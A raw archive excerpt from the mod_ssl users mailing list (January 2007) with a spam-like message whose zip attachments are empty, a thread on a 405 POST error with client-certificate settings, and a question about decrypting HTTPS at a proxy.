Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 18 16:00:48 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BCB4314D88A; Thu, 18 Jan 2007 16:00:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 7991214D83A
	for ; Thu, 18 Jan 2007 16:00:47 +0100 (CET)
Date: Thu, 18 Jan 2007 10:12:21 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 19 02:46:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 09BC214D892; Fri, 19 Jan 2007 02:46:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from biscayne-one-station.mit.edu (BISCAYNE-ONE-STATION.MIT.EDU [18.7.7.80])
	by master.modssl.org (Postfix) with ESMTP id D2B0714D873
	for ; Fri, 19 Jan 2007 02:46:47 +0100 (CET)
Received: from outgoing.mit.edu (OUTGOING-AUTH.MIT.EDU [18.7.22.103])
	by biscayne-one-station.mit.edu (8.13.6/8.9.2) with ESMTP id l0J1kJAO001926
	for ; Thu, 18 Jan 2007 20:46:19 -0500 (EST)
Received: from [192.168.1.2] (c-24-91-43-235.hsd1.ma.comcast.net [24.91.43.235])
	(authenticated bits=0)
        (User authenticated as mdiggory@ATHENA.MIT.EDU)
	by outgoing.mit.edu (8.13.6/8.12.4) with ESMTP id l0J1kIiN026836
	(version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NOT)
	for ; Thu, 18 Jan 2007 20:46:19 -0500 (EST)
Mime-Version: 1.0 (Apple Message framework v752.3)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Mark Diggory 
Subject: Same old 405 Post not allowed error
Date: Thu, 18 Jan 2007 20:46:42 -0500
X-Mailer: Apple Mail (2.752.3)
X-Scanned-By: MIMEDefang 2.42
X-Spam-Flag: NO
X-Spam-Score: 0.00
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Diggory 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I've been doing my research and can't find a solution for this issue,  
we have IP based virtual hosts with the following   
directives (which we really need) and are getting the 405 Post not  
allowed error. The issue does not seem to be addressed again for 3  
years now. Is there a solution to this?

http://marc.theaimsgroup.com/?l=apache-modssl&m=104857625910336&w=2

Here is my current configuration:

Gentoo:   1.12.6
mod_ssl:  2.8.25-r10
apache:    2.0.58-r2
mod_jk:    1.2.19
tomcat:      5.5.20-r7

Thanks in advance for any advice,

Mark R. Diggory
~~~~~~~~~~~~~
DSpace Systems Manager
MIT Libraries, Systems and Technology Services
Massachusetts Institute of Technology


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 19 03:10:49 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0592214D892; Fri, 19 Jan 2007 03:10:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rune.pobox.com (rune.pobox.com [208.210.124.79])
	by master.modssl.org (Postfix) with ESMTP id 7280014D873
	for ; Fri, 19 Jan 2007 03:10:48 +0100 (CET)
Received: from rune (localhost [127.0.0.1])
	by rune.pobox.com (Postfix) with ESMTP id 651CCA88FB
	for ; Thu, 18 Jan 2007 21:10:41 -0500 (EST)
Received: from [192.168.1.215] (unknown [69.55.70.22])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by rune.sasl.smtp.pobox.com (Postfix) with ESMTP id 38B1AA88B1
	for ; Thu, 18 Jan 2007 21:10:41 -0500 (EST)
Message-ID: <45B0288A.7030907@w3works.com>
Date: Thu, 18 Jan 2007 21:10:18 -0500
From: Dave Paris 
User-Agent: Thunderbird 1.5.0.9 (Macintosh/20061207)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Same old 405 Post not allowed error
References: 
In-Reply-To: 
X-Enigmail-Version: 0.94.0.0
OpenPGP: id=74329DF4;
	url=hkp://wwwkeys.us.pgp.net
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Mark,

a) you never added the contents of your  directive (i.e. "with
the following  directives..")
b) you don't specify *why* you need these, particularly given that
you're using IP-based virtual hosts. (i.e. "(which we really need)")

Without this information, it's impossible to answer your question and I
highly suspect that your solution lies with a minor reconfiguration.

Kind Regards,
- -dsp

Mark Diggory wrote:
> Hello,
> 
> I've been doing my research and can't find a solution for this issue, we
> have IP based virtual hosts with the following  directives
> (which we really need) and are getting the 405 Post not allowed error.
> The issue does not seem to be addressed again for 3 years now. Is there
> a solution to this?
> 
> http://marc.theaimsgroup.com/?l=apache-modssl&m=104857625910336&w=2
> 
> Here is my current configuration:
> 
> Gentoo:   1.12.6
> mod_ssl:  2.8.25-r10
> apache:    2.0.58-r2
> mod_jk:    1.2.19
> tomcat:      5.5.20-r7
> 
> Thanks in advance for any advice,
> 
> Mark R. Diggory
> ~~~~~~~~~~~~~
> DSpace Systems Manager
> MIT Libraries, Systems and Technology Services
> Massachusetts Institute of Technology
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFFsCiIKmNPF3QynfQRAomwAJ4pPBcfzWeeD93Q+YedPX8YV6ARMACfW4EZ
7277LvxtQRhQC8QzxBrE6h8=
=Eqmr
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 19 03:32:32 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EE75514D890; Fri, 19 Jan 2007 03:32:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from biscayne-one-station.mit.edu (BISCAYNE-ONE-STATION.MIT.EDU [18.7.7.80])
	by master.modssl.org (Postfix) with ESMTP id 36B4114D866
	for ; Fri, 19 Jan 2007 03:32:28 +0100 (CET)
Received: from outgoing.mit.edu (OUTGOING-AUTH.MIT.EDU [18.7.22.103])
	by biscayne-one-station.mit.edu (8.13.6/8.9.2) with ESMTP id l0J2W1cQ022194
	for ; Thu, 18 Jan 2007 21:32:01 -0500 (EST)
Received: from [192.168.1.2] (c-24-91-43-235.hsd1.ma.comcast.net [24.91.43.235])
	(authenticated bits=0)
        (User authenticated as mdiggory@ATHENA.MIT.EDU)
	by outgoing.mit.edu (8.13.6/8.12.4) with ESMTP id l0J2W0oh002522
	(version=TLSv1/SSLv3 cipher=AES128-SHA bits=128 verify=NOT)
	for ; Thu, 18 Jan 2007 21:32:00 -0500 (EST)
Mime-Version: 1.0 (Apple Message framework v752.3)
In-Reply-To: <45B0288A.7030907@w3works.com>
References:  <45B0288A.7030907@w3works.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
Message-Id: <3E6A210B-F08B-4A82-8E08-7F9036B94094@mit.edu>
Content-Transfer-Encoding: 7bit
From: Mark Diggory 
Subject: Re: Same old 405 Post not allowed error
Date: Thu, 18 Jan 2007 21:32:24 -0500
To: modssl-users@modssl.org
X-Mailer: Apple Mail (2.752.3)
X-Scanned-By: MIMEDefang 2.42
X-Spam-Flag: NO
X-Spam-Score: 0.00
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Diggory 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, I did mean to have that included. -thanks.

>        #   SSL Engine Switch:
>        SSLEngine on
>
>        #   Server Certificate:
>        SSLCertificateFile /etc/apache2/ssl/.....
>
>        #   Server Private Key:
>        SSLCertificateKeyFile /etc/apache2/ssl/.....
>
>        #   Certificate Authority (CA):
>        SSLCACertificateFile /etc/apache2/ssl/....
>
>
>        #  Force X.509 certificates to be used for this location
>        
>             Allow from all
>             Order allow,deny
>             SSLVerifyClient optional
>             SSLVerifyDepth  1
>             SSLOptions +StdEnvVars +ExportCertData +OptRenegotiate
>        
>
>        #  SSL Protocol Adjustments:
>        SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean- 
> shutdown downgrade-1.0 force-response-1.0

I've tried commenting out the  and placing the SSL  
directives at the VirtualHost level, this seems to work fine, but I  
can't have VerifyClient across the entire site due to complaints from  
users about Certificate challenges in I.E. etc.

thanks again,
Mark

On Jan 18, 2007, at 9:10 PM, Dave Paris wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi Mark,
>
> a) you never added the contents of your  directive (i.e.  
> "with
> the following  directives..")
> b) you don't specify *why* you need these, particularly given that
> you're using IP-based virtual hosts. (i.e. "(which we really need)")
>
> Without this information, it's impossible to answer your question  
> and I
> highly suspect that your solution lies with a minor reconfiguration.
>
> Kind Regards,
> - -dsp
>
> Mark Diggory wrote:
>> Hello,
>>
>> I've been doing my research and can't find a solution for this  
>> issue, we
>> have IP based virtual hosts with the following  directives
>> (which we really need) and are getting the 405 Post not allowed  
>> error.
>> The issue does not seem to be addressed again for 3 years now. Is  
>> there
>> a solution to this?
>>
>> http://marc.theaimsgroup.com/?l=apache-modssl&m=104857625910336&w=2
>>
>> Here is my current configuration:
>>
>> Gentoo:   1.12.6
>> mod_ssl:  2.8.25-r10
>> apache:    2.0.58-r2
>> mod_jk:    1.2.19
>> tomcat:      5.5.20-r7
>>
>> Thanks in advance for any advice,
>>
>> Mark R. Diggory
>> ~~~~~~~~~~~~~
>> DSpace Systems Manager
>> MIT Libraries, Systems and Technology Services
>> Massachusetts Institute of Technology
>>
>>
>> _____________________________________________________________________ 
>> _
>> Apache Interface to OpenSSL (mod_ssl)                    
>> www.modssl.org
>> User Support Mailing List                      modssl- 
>> users@modssl.org
>> Automated List Manager                             
>> majordomo@modssl.org
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.1 (Darwin)
>
> iD8DBQFFsCiIKmNPF3QynfQRAomwAJ4pPBcfzWeeD93Q+YedPX8YV6ARMACfW4EZ
> 7277LvxtQRhQC8QzxBrE6h8=
> =Eqmr
> -----END PGP SIGNATURE-----
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

Mark R. Diggory
~~~~~~~~~~~~~
DSpace Systems Manager
MIT Libraries, Systems and Technology Services
Massachusetts Institute of Technology


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 19 08:22:09 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AC61F14D873; Fri, 19 Jan 2007 08:22:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pawna.gs-lab.com (pawna.gs-lab.com [59.163.66.100])
	by master.modssl.org (Postfix) with ESMTP id 95ADB14D85B
	for ; Fri, 19 Jan 2007 08:22:05 +0100 (CET)
Received: from colorado ([192.168.0.112])
	by pawna.gs-lab.com (8.12.9/8.12.9) with SMTP id l0J7D0SE003488
	for ; Fri, 19 Jan 2007 12:43:10 +0530 (IST)
Message-ID: <01de01c73b9a$6d058870$7000a8c0@colorado>
From: "Nikhil Kadu" 
To: 
Subject: Decrypting the HTTPS requests
Date: Fri, 19 Jan 2007 12:51:09 +0530
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01DB_01C73BC8.7DFEFF70"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3028
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nikhil Kadu" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01DB_01C73BC8.7DFEFF70
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi Guys,

Is it possible to decrypt the encrypted data in an HTTPS =
request/response while sitting in the Apache Proxy? Which functions of =
MOD_SSL and MOD_PROXY modules need to be tweaked to achieve this? Please =
let me know if somebody has done some related work.

Best regards,
Nikhil Kadu
------=_NextPart_000_01DB_01C73BC8.7DFEFF70
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi Guys,


 


Is it possible to decrypt the =
encrypted data=20
in an HTTPS request/response while sitting in the Apache Proxy? =
Which=20
functions of MOD_SSL and MOD_PROXY modules need to be tweaked to =
achieve=20
this? Please let me know if somebody has done some related =
work.


 


Best regards,


Nikhil Kadu


------=_NextPart_000_01DB_01C73BC8.7DFEFF70--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 19 16:22:21 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C7CBE14D87B; Fri, 19 Jan 2007 16:22:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sceptre.pobox.com (sceptre.pobox.com [207.106.133.20])
	by master.modssl.org (Postfix) with ESMTP id 5516A14D85B
	for ; Fri, 19 Jan 2007 16:22:21 +0100 (CET)
Received: from sceptre.pobox.com (localhost.localdomain [127.0.0.1])
	by sceptre.pobox.com (Postfix) with ESMTP id 3FB49745
	for ; Fri, 19 Jan 2007 10:22:15 -0500 (EST)
Received: from [192.168.1.215] (unknown [69.55.70.22])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by sceptre.sasl.smtp.pobox.com (Postfix) with ESMTP id 1960D1EAFB
	for ; Fri, 19 Jan 2007 10:22:14 -0500 (EST)
Message-ID: <45B0E210.1010200@w3works.com>
Date: Fri, 19 Jan 2007 10:21:52 -0500
From: Dave Paris 
User-Agent: Thunderbird 1.5.0.9 (Macintosh/20061207)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Decrypting the HTTPS requests
References: <01de01c73b9a$6d058870$7000a8c0@colorado>
In-Reply-To: <01de01c73b9a$6d058870$7000a8c0@colorado>
X-Enigmail-Version: 0.94.0.0
OpenPGP: id=74329DF4;
	url=hkp://wwwkeys.us.pgp.net
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
